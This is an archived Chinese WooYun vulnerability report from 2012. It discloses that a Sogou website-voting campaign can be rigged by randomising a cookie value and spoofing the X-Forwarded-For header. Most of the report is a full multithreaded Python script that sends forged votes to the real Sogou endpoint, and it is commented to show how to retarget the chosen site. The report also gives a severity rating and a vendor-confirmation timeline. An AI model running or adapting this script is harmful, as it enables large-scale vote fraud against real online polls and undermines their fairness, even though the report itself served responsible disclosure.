乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-12-08: 细节已通知厂商并且等待厂商处理中 2012-12-10: 厂商已经确认,细节仅向厂商公开 2012-12-20: 细节向核心白帽子及相关领域专家公开 2012-12-30: 细节向普通白帽子公开 2013-01-09: 细节向实习白帽子公开 2013-01-22: 细节向公众公开
搜狗举办的“我最喜爱的网站评选”活动判断不严谨,存在任意刷票漏洞
用浏览器投票只能投一次。但是修改cookie当中的ssuv参数后可以多投几次。但是投几次后还是提示已经投过票了,明天再来吧。给http头信息中增加X-Forwarded-For参数可以继续投票。总之不断修改cookie当中的ssuv参数和http头信息当中的X-Forwarded-For的参数,即可达到任意投票目的。方便你们测试,测试代码送上。
#!/usr/bin/python#-*-coding:gbk-*-import sysimport urllibimport urllib2import randomimport hashlibimport timeimport threadingreload(sys)sys.setdefaultencoding("gbk")def getstr(n): st = '' while len(st) < n: temp = chr(97+random.randint(0,25)) if st.find(temp) == -1 : st = st.join(['',temp]) return stdef rush_vote(ip_last_num): my_str = getstr(5) hash_str = hashlib.md5(my_str).hexdigest() header = { "Host": "123.sogou.com", "Connection": "keep-alive", "Cache-Control": "max-age=0", "Origin": "http://123.sogou.com", "X-Forwarded-For": "192.168.10." + str(ip_last_num), "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Referer": "http://123.sogou.com/sub/huodong.html", "Accept-Language": "zh-CN,zh;q=0.8", "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", "Cookie": "SUID=A87F43765A590B0A4E4B1147000A65AS; SUV=1314147641152662; SMYUV=1333688377353101; sct=8; CXID=44816CD75C2C1E64BC0F7F7EAF23186E; IPLOC=CN1101; ssuv="+hash_str+"; CNZZDATA30074789=cnzz_eid=63247164-1354672656-&ntime=1354672656&cnzz_a=5&retime=1354672675763&sin=<ime=1354672675763&rtime=0; spid=; GOTO=", } datas = { "id[]":123, #待投票网站id,想投给谁修改即可 "user_name":"", "user_num":"", "user_email":"", "user_address":"", } datas = urllib.urlencode(datas) request = urllib2.Request("http://123.sogou.com/sub/hd/vote_new.php", data = datas, headers = header) f = urllib2.urlopen(request) content = f.read() return contentclass my_thread(threading.Thread): def __init__(self, ip_last_num): threading.Thread.__init__(self) self.ip_last_num = ip_last_num def run(self): for i in range(1, 3000): content = rush_vote(self.ip_last_num) if content.find("投票成功,感谢您的参与!") != -1: print '%s Vote success.\r\n' % str(i) else: print '投票失败,中断, 重新调整ip' + "\r\n" self.ip_last_num = self.ip_last_num + 20 self.run() time.sleep(10) mythread = {}for row in range(40, 80): #开40个线程 mythread[row] = my_thread(row) mythread[row].start()print "投票成功"
随便找一个网站。刷票之前票数:
开40个线程,两分钟后:
Over,测试而已。赶快处理吧,不然有失公正。
X-Forwarded-For可以伪造,用别的做验证吧。
危害等级:中
漏洞Rank:7
确认时间:2012-12-10 08:12
处理中
暂无